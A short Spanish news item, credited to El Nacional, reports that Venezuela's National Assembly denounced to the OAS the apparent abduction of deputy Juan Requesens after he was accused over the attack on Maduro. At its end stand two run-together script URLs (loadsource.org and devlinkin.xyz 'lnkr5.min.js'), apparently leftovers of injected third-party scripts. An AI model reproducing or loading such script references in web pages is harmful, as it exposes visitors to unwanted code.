Familiares y compañeros del dirigente de Primero Justicia indicaron que no lo han visto desde el martes.

La Asamblea Nacional denunció este viernes ante la sede de la Organización de Estados Americanos (OEA) que el diputado Juan Requesens fue secuestrado por el gobierno venezolano.

“Hemos entregado ante la representación de la OEA un documento en el que denunciamos la violación de la inmunidad parlamentaria de Julio Borges y de Juan Requesens y el secuestro del diputado por el estado Táchira”, dijo Jorge Millán.

Requesens fue acusado por las autoridades en de organizar el “atentado” contra Nicolás Maduro.

Familiares y colegas del diputado denunciaron que no han podido verlo desde que fue detenido por funcionarios del Servicio Bolivariano de Inteligencia Nacional (Sebin).

“Sabemos que la OEA va a acoger ese documento y a tomar acciones desde el plano internacional”, añadió Millán.

El texto es un acuerdo aprobado por unanimidad el jueves, en una sesión especial, que condena el levantamiento del fuero del diputado Julio Borges y la desaparición forzada de Requesens.El parlamentario fue acusado por las autoridades de organizar el “atentado” contra Nicolás Maduro el 4 de agosto durante un desfile militar.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533946020237https://devlinkin.xyz/addons/lnkr5.min.js

Loading...